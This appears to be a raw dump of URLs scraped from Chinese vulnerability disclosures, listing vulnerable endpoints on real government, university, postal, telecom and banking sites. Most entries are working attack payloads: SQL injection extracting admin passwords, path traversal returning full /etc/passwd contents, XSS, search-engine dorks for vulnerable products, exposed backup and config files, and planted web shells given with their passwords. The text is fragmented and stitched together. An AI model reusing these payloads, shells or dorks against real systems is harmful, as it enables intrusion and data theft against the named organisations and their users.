http://www.189eyes.com:8000/jsp/findPassword/findPasswordSetp1.action http://sjkd.online.cq.cn:8000/jsp/findPassword/findPasswordSetp1.action http://www.ynpost.com/jc/jcps-car.asp?action=shopbag http://www.ynpost.com/jc/shopsearch.asp http://www.ynpost.com/jc/shoporder.asp POC:http://kcal.pw/t5.htm https://baidu.com http://www.cet.edu.cn/ http://www.cet.edu.cn/tongji_view.php?act=update http://www.cet.edu.cn/ http://demo.yezby.com/ http://demo.yezby.com//web/content_two.aspx?ID=sCzAN8Fr http://jd.cust.edu.cn/jpk/gccl/article_show.asp?id=245 https://61.155.108.212/portal/index.jsp http://store.meizu.com/order/ajax_get_zip_code http://218.200.204.33:8080/manager/html http://60.217.100.172/manager/html http://xgh.hubu.edu.cn/old/sys.asp http://58.251.33.155:8080/ http://58.251.33.182:8080/ http://58.251.33.183:8080/ http://211.103.10.110:80/ http://crimlaw.whu.edu.cn/ http://apps.weibo.com/aiweibo ttp://t.cn/Rhdd4Zp http://apps.weibo.com/aiweibo http://oa.ctrl.189.cn/web/login.do http://fuwu.oppo.com:8899/login.asp http://fuwu.oppo.com:8899/files/ http://fuwu.oppo.com:8899/files/policy/343326076.jpg http://219.149.148.74/ http://219.149.148.74/lbsLogin/login.action http://218.200.185.60:8080/ http://60.22.64.131/ http://web2.gdupt.edu.cn/zzzx/index.php?m=index&a=content&id='60 http://www.ddjy.cug.edu.cn/articleShow.jsp?newsID=9969 http://wooyun.org/bugs/wooyun-2014-073053 http://vshare.wo.com.cn/v/ http://game.wo.com.cn/wap_new/index.jsp http://221.212.204.27/ http://221.212.204.27/rzpx1/ http://221.212.204.27/17j5zqh/ http://221.212.204.27/18d/ http://221.212.204.27/jjxx/index.asp http://221.212.204.27/ks/ http://221.212.204.27/nangang/ http://221.212.204.27/rzpx2/ http://221.212.204.27/yilan/ http://221.212.204.27/18d3/adminweb/upimages/nihao.asp IP:27.50.129.6 http://27.50.129.6/index.php?a=login&c=../../../../../../../../../../etc/passwd%00.jpg http://zone.wooyun.org/content/2196 http://hospital.glmc.edu.cn/fckeditor//editor/filemanager/connectors/test.html http://27.17.40.164/Default.aspx http://58.222.235.93:80/ http://60.22.137.14:80/ http://www.hnkj.com.cn/ inurl:/main/model/childcatalog/ http://www.ahhbly.gov.cn/main/model/childcatalog/fileFind.do?fcode=00403&title=aaa http://www.ahly.gov.cn/main/model/childcatalog/fileFind.do?fcode=0010916&title=aaa http://www.ahchizly.gov.cn/main/model/childcatalog/fileFind.do?fcode=01607&title=aaa http://www.ahgdkj.com/main/model/childcatalog/fileFind.do?fcode00106&title=aaa http://zmahzy.ccmcgc.com/main/model/childcatalog/fileFind.do?fcode=02405&title=aaaaaa http://wooyun.org/bugs/wooyun-2010-058381 http://wooyun.org/bugs/wooyun-2014-073439 http://wooyun.org/bugs/wooyun-2010-058381 http://122.225.84.54/ http://www.ruiwen.com/index_style2.php?style2=10 http://elephant.ruiwen.com/download.php?file_id=400 http://210.21.24.166:80/ http://219.235.89.47/ http://17186.cn/login/login.3.jsp?url1=/component/magicmarket/index.jsp http://17186.cn/activity/step/index.jsp http://www.mxzzzs.com/web/typesearch.aspx http://www.mxzzzs.com/admin/Login.aspx http://hb.kandian.189.cn/WsMobile/login_logout.do http://www.mobile-manage.com.cn:8081/PSLManager/services/GroupServices http://www.cloud-manage.com.cn:8082/CloudService/services/CloudService http://127.0.0.1:6888 http://202.109.75.158:8082/SMGPServer/send.do http://oos-sh.ctyunapi.cn http://oos-sh-iam.ctyunapi.cn http://stuplaza.whut.edu.cn/documents/showarticle.aspx?Article_ID=201311051859319463 http://stuplaza.whut.edu.cn/magazine/list.aspx?Class_ID=20060328144638 http://stuplaza.whut.edu.cn/magazine/content.aspx?Article_ID=201311061927391864 http://stuplaza.whut.edu.cn/quest/showarticle.aspx?Article_ID=201409260013568311 http://gjzx.cumt.edu.cn/news.aspx?newid=213 http://gjzx.cumt.edu.cn/votes.aspx?wenjuan_id=1 http://gdjy.cumt.edu.cn/About.asp?id=12和 http://gdjy.cumt.edu.cn/show.asp?id=2360 http://sac.cumt.edu.cn/view.aspx?id=910和 http://sac.cumt.edu.cn/page.aspx?id=11 http://sjc.cumt.edu.cn/sjfg.aspx?lanmuid=%e5%9b%bd%e5%ae%b6%e5%ae%a1%e8%ae%a1%e6%b3%95%e8%a7%84和 http://sjc.cumt.edu.cn/lanmu.aspx?lanmuid=%e6%96%b0%e9%97%bb%e5%8a%a8%e6%80%81和 http://sjc.cumt.edu.cn/main.aspx?lanmuid=%e5%ae%a1%e8%ae%a1%e5%85%ac%e5%91%8a和 http://sjc.cumt.edu.cn/article.aspx?id=380 http://cmee.cumt.edu.cn/DefaultList.aspx?Location=1 http://gjzx.cumt.edu.cn/fuwu_info.aspx?fuwu_id=47和 http://gjzx.cumt.edu.cn/product.aspx?proid=3 http://cwjh.njau.edu.cn/Views/newsContent.aspx?contentID=345&ClassID=6 http://cwjh.njau.edu.cn/Views/newsContent.aspx?ClassID=2&contentID=46 http://www.hsszjj.gov.cn/dtinfo.aspx?flag=7&id=481 http://kgq.broadair.net:8800/ATCS/disp.action http://yn.kandian.189.cn/WsMobile/login_register.do http://gs.kandian.189.cn/WsMobile/login_login.do http://gx.kandian.189.cn/WsMobile/login_login.do http://www.cdyztx.com/login!toLogin.action http://www.yiliangoo.com/ http://124.205.180.177/。 http://124.205.180.177/help.jsp pass:chopper http://www.yiliangoo.com/search.php?g=0&b=0&c=&s=0&k=%27 http://www.ego10000.com/search.php?b=687&c=1'%22&g=703 http://www.ego10000.com/ajax_check_user.php?email= http://ego10000.com/includes/footer.php http://hsypjg.net/login.action http://ms.linekong.com index.php/pay/index/get_servers_select http://pay.g.letv.com http://hctools.it168.com/submit.php?action=get_brand_print&brandid=* http://g.letv.com/dxz/news/206*.html http://www.gzpost.com.cn/WebSite/EMarket/Car.aspx?NavID=26 http://www.gzpost.com.cn/WebSite/EMarket/PeccancySearch.aspx?NavID=26 http://www.gzpost.com.cn/WebSite/PostalInfo/LatticePoint.aspx?NavID=72&ID=520001&upid=1 http://www.gzpost.com.cn/WebSite/PostalInfo/LatticePoint.aspx?NavID=72&ID=1 http://amoi.it168.com/.svn/entries http://apple.it168.com/.svn/entries http://gphone.it168.com/.svn/entries http://www.shaanxijh.com/vote/voteresult.asp?ID=30 http://www.heshigf.com/m_admin/login.asp?err=2 http://www.heshigf.com/page.asp?id=9&typeid=4%27 http://www.xieji001.com/page.asp?id=9&typeid=4%27 http://www.shzeshan.com/page.asp?id=9&typeid=4%27 http://www.musigmagroup.com/page.asp?id=9&typeid=4%27 http://festacorp.com/page.asp?id=9&typeid=4%27 http://sh-xebb.com/page.asp?id=9&typeid=4%27 http://www.edwinlawyer.com/page.asp?id=9&typeid=4%27 http://211.151.82.170/page.asp?id=9&typeid=4%27 http://www.bcrj.com.cn/ url:my.tv189.com inurl:Scenic_detail.php?scenicId= http://www.wnszxyy.com/guahao.asp?a=1&kid=67 http://www.gd189fq.com/new/ordersuc.php?&orderid=956 http://www.gd189fq.com/new/ordersuc.php?&orderid= http://people.178.com/humen.php?aid=1332 http://www.gansupost.com/bulletin/get_BULLETIN_List.shtml?category=1&start=13 http://www.gansupost.com/xxjs/go_XXJS_List.shtml?category=1 http://www.gansupost.com/intro/go_DJGJ_List.shtml?category=1 http://www.gansupost.com/bulletin/get_BULLETIN_List.shtml?category=1 http://www.gansupost.com/gjzl/go_GJZL_List.shtml?category=1 http://www.gansupost.com/operation/goOperation.shtml?titleselect=1&operationid=1&itemid=1 http://cw.zhangqiu.gov.cn:8081/weblogin/ http://cw.zhangqiu.gov.cn:8081/weblogin/login.aspx http://cw.zhangqiu.gov.cn:8081/weblogin/loginUser/pLoginUserList.aspx部分密码泄露 http://cpcenter.forrising.com:8001/console http://bbs.paipai.com http://bbs.paipai.com/config/config_global.php.bak http://202.102.116.111:8080/irec/download?fileName=./WEB-INF/web.xml&filePath=./../ http://202.102.116.111:8080/irec/download?fileName=./WEB-INF/classes/struts.xml&filePath=./../ http://202.102.116.111:8080/irec/download?fileName=/WEB-INF/classes/resources/config/datasource/ds-2.xml&filePath=./../ http://202.102.116.111:8080/irec/download?fileName=/WEB-INF/lib/struts2-core-2.3.16.1.jar&filePath=./../ http://202.102.116.111:8080/irec/myUpload https://etrade.gfgroup.com.hk/HKTrade/login.action http://pth.gzucm.edu.cn/index.action http://www.gxnun.net/32nnsztsg/NewsView.asp?id=54 https://mail.kingosoft.com/ http://www.imooc.com/user/resetpasspage?active=MTIzNDU2QDE2My5jb20sMTQxMjc1ODc4Mw==&uuid=NDMwMjc4&linkid=MTE4NTk1 http://xb.swjtu.edu.cn/public/viewSpeech.aspx?ID=42 http://ghc.swjtu.edu.cn/public/viewSingle.aspx?TYPE=2和 http://ghc.swjtu.edu.cn/public/eng.aspx?TYPE=7和 http://ghc.swjtu.edu.cn/public/viewNews.aspx?ID=265 http://lixue.swjtu.edu.cn/jyjx.php?pid=19和 http://lixue.swjtu.edu.cn/zsjy.php?pid=31和 http://lixue.swjtu.edu.cn/xsgz.php?pid=37&id=14984和 http://lixue.swjtu.edu.cn/kxyj.php?pid=26&id=14920和 http://lixue.swjtu.edu.cn/jyjx.php?pid=20&id=14983和 http://lixue.swjtu.edu.cn/xydt.php?pid=49&id=14972和 http://lixue.swjtu.edu.cn/zsjy.php?pid=31&id=14350 https://mail.gssb.gov.cn/ http://www.lxjx.cn/framework/plugin/kindeditor/php/demo.php http://111.1.5.132:8080/Conf/jsp/user/loginAction.do http://111.1.15.81/admin/Index/index verify.doc/a.php http://demo.trunkey.com/和另一Nginx站点没有成功(估计早发现了。)这套系统难道是一键安装集成环境,导致出现解析漏洞???如果被非法利用脱裤子的话,造成大量备案信息泄露。。。 http://beian.ocn.net.cn/images/photo//201410/34077c8351ba80f7a8892f659e6fc80e.jpg/a.php http://61.152.94.110/images/photo//201410/7bf360de86ed0eab8a95ebc9d044799f.jpg/a.php http://www.cache.qq500.com/images/photo//201410/21dfbaea116977d6807090422f59726c.jpg/a.php http://ba.online.sh.cn/images/photo//201410/20707367f9979bd3cc15838d920713aa.jpg/a.php http://beian.4bo.cn/images/photo//201410/757dd84ad8ff1af50d9e9591da8d2776.jpg/a.php http://61.152.108.190/images/photo//201410/3e12124d592a2ba19b540a3a7c020b4f.jpg/a.php http://web53406.5udns.cn/images/photo//201410/c5b4619600b838cb096915c1d78bff45.jpg/a.php http://beian.yesjing.com/images/photo//201410/c38eca1519b34af1a9fd0a35a0806156.jpg/a.php http://www.weidc.net/images/photo//201410/2da08be52c91df23489cc42c2cb5d96d.jpg/a.php http://www.qq500.com/images/photo//201410/21dfbaea116977d6807090422f59726c.jpg/a.php http://211.144.210.22/images/photo//201410/3062d9d83a51f938c88a5cd35fbf32ce.jpg/a.php http://61.129.70.11/images/photo//201410/91c2df466f045b1a35baea7cd2ae32b7.jpg/a.php http://www.letuo.net/images/photo//201410/76b364c38c88779e8e6c992bc172104f.jpg/a.php pass:ki11,还有好多,不一一测试了。复现时,麻烦请把shell全删除。貌似比较严重哦。。。。。 http://bbs.chexun.com/3g/view.php?tid= http://wooyun.org/bugs/wooyun-2014-066661 http://wooyun.org/bugs/wooyun-2014-074281 http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-xxxx%2527%2529%253E0%2520or%2520sleep%2528if%25281%252C5%252C1%2529%2529%2529%2523-typeid-5.html http://my.51job.com/cv/EResume/CV_EModDefault.php?ReSumeID=318302541&38698 https://mail.aliyun.com/attachpreview/aps_key_2722238350_714e89975fd1f472dc7d92e39d4860f2.jpg http://x55.me/csrf.htm https://mail.aliyun.com/alimail/ https://124.133.254.82:4443/admin/index https://202.113.49.95/admin/index https://218.28.167.11/admin/index https://202.113.20.208/admin/index http://219.140.193.253/hrss/login.jsp为例子 http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jsp http://ischool.edu.sina.com.cn/?p=school&s=compare&a=schoolcompare&s1=51&s2=364 http://www.xjpost.com.cn/guestbook/search.jsp?search=search http://www.xjpost.com.cn/guestbook/add.jsp?action=add http://www.jingyingfanglue.com/news_detail.asp?id=60499%20union%20se%lect%201,admin,password,password,5,6,7,8,9,10,11,12%20from%20admin_user%20where%20id=1 http://wooyun.org/bugs/wooyun-2014-066661 http://wooyun.org/bugs/wooyun-2014-074281 http://localhost/maccms8/index.php?m=art-search-wd-x%2527%2529%253E0%2520and%2520sleep%2528if%25281%252C5%252C1%2529%2529%2523 https://github.com/keviswang/nbcbmail/blob/0fa7157bf7964429694a12480ccad5a127b3ebfe/Loginmail.py http://www.douguo.com/ http://www.zssy.com.cn/Admin/Manage http://stat.sdcp.cn/stat.aspx?docid=152361存在Sql注入, http://sj.sdcp.cn/qst/qst.aspx?lx=1 http://ucenter.shikee.com/accountsec/editemail http://ucenter.shikee.com/email/verify http://ucenter.shikee.com/email/resetemail?operatetype=1&email=你的邮箱&code=任意六个数字 http://www.wooyun.org/bugs/wooyun-2014-078349/trace/0a7a519f0aa40359cd32007d73cc6e5f http://note.sdo.com/u/635480660904716277/NoteContent/eSOvR~l30NfVM702w000wP http://www.czhos.com http://www.czhos.com//fckeditor/editor/filemdeager/connectors/test.html http://www.czhos.com/enter_page/Upload/FCKEditor/media/1.aspx http://www.czhos.com/enter_page/Upload/FCKEditor/media/img.asp http://10198.bbn.com.cn/beijingtwo/register/register.jsp http://www.ncsshk.com/ http://www.yp.net.cn http://www.qq.com\:%2f%23@www.yp.net.cn www.yp.net.cn这个网站 http://jf.gzuni.com/temp/nopaydetail_.tsv http://jf.gzuni.com/bill/temp/gzrhcaixiquan_info_pack.tsv http://jf.gzuni.com/temp/nopaydetail_201310.tsv http://jf.gzuni.com/temp/nopaydetail_201311.tsv http://jf.gzuni.com/temp/nopaydetail_201312.tsv http://jf.gzuni.com/temp/nopaydetail_201401.tsv http://jf.gzuni.com/temp/nopaydetail_201402.tsv http://jf.gzuni.com/temp/nopaydetail_201403.tsv http://jf.gzuni.com/temp/nopaydetail_201404.tsv http://jf.gzuni.com/temp/nopaydetail_201405.tsv http://jf.gzuni.com/temp/nopaydetail_201406.tsv http://jf.gzuni.com/temp/nopaydetail_201407.tsv http://jf.gzuni.com/temp/nopaydetail_201408.tsv http://jf.gzuni.com/temp/nopaydetail_201409.tsv http://jf.gzuni.com/temp/nopaydetail_2014010.tsv http://www.63si.com.cn/sclssbClient/login.html http://www.jyg.gov.cn:5555/ http://www.jyg.gov.cn:5555/dc/ http://www.zaojiao.com http://bk.chinapost.com.cn/vip/login.jsp http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/file/imp_examples.xls http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/login.jsp http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false named:x:25:25:Named:/var/named:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hacluster:x:511:90::/home/hacluster:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin bea:x:512:512::/home/bea:/bin/bash nsi:x:513:512::/home/nsi:/bin/bash oracle:x:514:513::/oracle:/bin/bash dkhxt:x:515:512::/home/dkhxt:/bin/ksh wisentsoft:x:516:516::/home/wisentsoft:/bin/bash mobile:x:517:512::/home/mobile:/bin/bash www.yajsgh.gov.cn/upload/20141009/12/x.asp URL:http://118.85.207.70:8080/login!loginPage.html http://www.hljiad.com/typelist.jsp?lmid=36&type=1 http://www.weaver.com.cn/ inurl:maint/login/Page.jsp http://27.155.177.113:81/page/maint/login/Page.jsp?templateId=6&logintype=1 http://58.62.113.250:8088/page/maint/login/Page.jsp?templateId=4 http://oa.christine.com.cn/page/maint/login/Page.jsp?templateId=82&null http://www.e-cology.com.cn/page/maint/login/Page.jsp?templateId=18&logintype=2 http://oa.funglian.com/page/maint/login/Page.jsp?templateId=4&logintype=1&message=55 http://12580.10086.cn/new/member/loginReg_addPassword.do?memberno=309966993&type=findPassword&sitepassword=catr1234 http://staff.chinacars.com:8181/spam/system/index.action http://www.lshj.gov.cn:80/hbjfront/xsxxnew.aspx?minid=196 http://kindeditor.net/ http://www.bangcle.com/ http://secneo.com/ https://github.com/cxl008/blatta http://www.szsbzx.net.cn:9900/web/website/indexProcess.action http://mail.600795.com.cn:8181/spam/system/index.action http://www.weaver.com.cn/ inurl:homepage/LoginHomepage.jsp http://group.e-cology.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 http://km.chinadrtv.com/homepage/LoginHomepage.jsp?hpid=21&isfromportal=1&templateId=42&null&templateId=42&null http://oa.eastall.com:8081/homepage/LoginHomepage.jsp?hpid=62&isfromportal=1&templateId=41&null&templateId=41&null http://oa.ankai.com/homepage/LoginHomepage.jsp?hpid=81&opt=privew http://oa.funglian.com/homepage/LoginHomepage.jsp?hpid=83&isfromportal=1&templateId=4&null&templateId=4&null http://ylt.11185.cn/web.rar http://211.156.198.57 http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip&paths=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=/wooyun.txt&paths=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false nscd:x:28:28:NSCD Daemon:/:/sbin/nologin zabbix:x:100:101:Zabbix System:/var/lib/zabbix:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin dbmail:x:101:102:DBMail Account:/var/lib/dbmail:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin ident:x:98:98::/:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin hacluster:x:511:90::/home/hacluster:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ipos:x:512:512::/home/ipos:/bin/bash oracle:x:513:513::/home/oracle:/bin/bash yzznzd:x:514:512::/home/yzznzd:/bin/bash http://wan.sdo.com/ http://www.lib.sxu.edu.cn/details.jsp?ID=212 http://www.conking.com.cn/ Login:LoginName http://www.chengtongka.com/shgllogin.php inurl:servlet/FileDown?fjxxId= https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715 https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=1 https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=2 http://teleuc.com/ http://meetinglive.teleuc.com//main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://bgifx.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://pop136.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://kuniyasu.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://jkec.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://dcmfx.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://pthl.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://cuconline.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://gzosta.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://semia.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://es.scnu.edu.cn/ http://es.scnu.edu.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 http://xkbm.hebhk.com/adminlogin.aspx http://www.dl-huawen.com/pages/login.jsp http://58.49.58.226:8090/admin/Article/Add http://www.qdgtj.gov.cn/Showhf.asp?ID=93 http://c.liepin.com/ http://article.liepin.com/ask/qa196028 http://c.liepin.com/resume/getdefaultresume/ http://218.57.204.115/index.php?m=Index&a=login http://www.doc88.com/p-608999920248.html http://wm2gmail.263.net/mail/login/opt/loginAction_getLogoBanner.do?domain=test%22;}alert%28/xss/%29%3C/script%3En.com&func=dmloginshow http://www.qhzyy.com.cn/search.aspx?key=1 http://jwc.sxnu.edu.cn/jwcweb/new_show.asp?xw_id=91 http://www.press.shu.edu.cn/book_category.aspx?Class_ID=1740和 http://www.press.shu.edu.cn/book_reviewid.aspx?Class_ID=346 inurl:homepages/index.aspx http://hf.jjbctv.com/webpages/bjcx_list_page.aspx http://qlgk.taixing.gov.cn/webpages/bjcx_list_page.aspx http://58.222.216.220/ggweb/webpages/bjcx_list_page.aspx http://qlgk.taixing.gov.cn/webpages/bjcx_list_page.aspx http://58.222.216.220/ggweb/webpages/bjcx_list_page.aspx http://hf.jjbctv.com/webpages/bjcx_list_page.aspx http://www.jseic.gov.cn:8081/jxwweb/webpages/bjcx_list_page.aspx http://58.213.129.206:8080/jytweb/webpages/bjcx_list_page.aspx http://www.yiqizou.com/get_map_info.php?user_id=121 http://tui.infzm.com/?a=index&c=login site:hit.edu.cn site:hit.edu.cn http://www.sasacgs.gov.cn/list.jsp?classid=3 http://www.able-elec.com/ http://xx.xx.xx.xx/G2S/AbleSystem/WebSystem/WebSystemIndex.aspx http:/xx.xx.xx.xx/G2S/ZipFile/ZipFlle.aspx http://www.hufe.edu.cn/parts.php?id=293 http://ygxy.rsgis.whu.edu.cn/admin/user.add.php http://www.viacloud.com.cn/ http://portal.viacloud.com.cn/user/login http://www.listentech.com.cn/ http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://brand.66wz.com/store.php?id=18 http://www.hnagri.gov.cn/comm_front/supply/view.jsp?market_id=15576-7399 http://wenda.bootcss.com/question/38 http://bk.11185.cn/index.do,注册了两个用户分别下了两个订单,在登录进去后查看订单,却跳转到了http://it.11185.cn/chinapostintegrate/owner/orderlist.a http://www.shyusrmyy.com/ http://www.shyusrmyy.com/search.asp?keys=2 http://www.qianrengou.com/m.php?m=User&a=doLogin ttp://www.xinjianghu.com.cn/m.php?m=User&a=doLogin http://www.jt306.cn/wap/login/home.do http://202.102.116.81:8080/jsp/front/activity/template/music.jsp?actId=185&channelCode=2623&actRingId=1 http://www.lygbus.com/shownews.php?aou=103 http://183.60.90.133/ http://183.60.90.133/common/shell/BillBack.sh http://www.timber2005.com/ http://px3.timber2005.com/GovUserControl/Demo.aspx http://360-sem.net/GovUserControl/Demo.aspx http://www.frpx.cn/GovUserControl/Demo.aspx http://218.106.254.26:801/GovUserControl/Demo.aspx http://px.mqxwdx.cn/GovUserControl/Demo.aspx http://www.jlaav.cn/hyxw.asp?id=1000&view=t http://tjzxfc.com/index.php/Index/search?q=1&__hash__=d04eed84cdaac7b7d81d68a6e259710c http://cpa.cqu.edu.cn/articleShow.php?tid=18&nid=1605和 http://cpa.cqu.edu.cn/articleShow.php?nid=1655 http://www.cmse.cqu.edu.cn/?idx=news&act=show&id=1667 http://219.139.134.9:70/logincheck.php http://www.ccas.com.cn:8008/logincheck.php http://122.144.134.79/logincheck.php http://123.233.240.119/logincheck.php http://61.175.246.20/logincheck.php http://www.swiee.com/index!register.action http://video5.51cto.com/ http://video5.51cto.com/index.php?s=/Auth/user/login http://www.sjzzyy.com/channel.aspx?id=31&s=1 https://e.boc.cn/ehome/#/shopsCommunity/shopDetail/EN1000000300 https://e.boc.cn/ehome/#/shopsCommunity/shopDetail/EN1000000300 http://wx.infzm.com/?c=listen&a=view&id=95459 http://jpkc.zjjcxy.cn/jpkc/sjjcgl/Admin_Login.asp https://e.boc.cn/ehome/#/shopsCommunity/productDetail/EP10000001419 https://e.boc.cn/ehome/#/shopsCommunity/productDetail/EP10000001419 http://113.200.215.173:8080/ http://218.207.206.161:80/ http://218.24.29.30:80/ http://218.26.195.158:80/ http://211.140.220.178:80/ https://open.boc.cn/grouppm/item/23132 http://open.boc.cn/user/doGetPwd?new_password=85bf5831e593431e882887e077400b7f&cfm_password=85bf5831e593431e882887e077400b7f&randomid=&randomen=&randomnn=&randomold=&enctyp=1&code=YToyOntzOjM6InVpZCI7czoxNzoiMjc1NDM3MTMxN0BxcS5jb20iO3M6NToidmNvZGUiO3M6NjoiMTM0MDc2Ijt9&sid=0.45036256207507386 https://e.boc.cn/ehome/#/shopsCommunity/kindProduct/PC1002 https://e.boc.cn/ehome/#/shopsCommunity/kindProduct/PC1002 https://e.boc.cn/ehome/#/shopsCommunity/kindProduct/PC1002 http://www.fzjsqqy.cn/ http://www.fzjsqqy.cn/vreg.aspx?parent_id=1 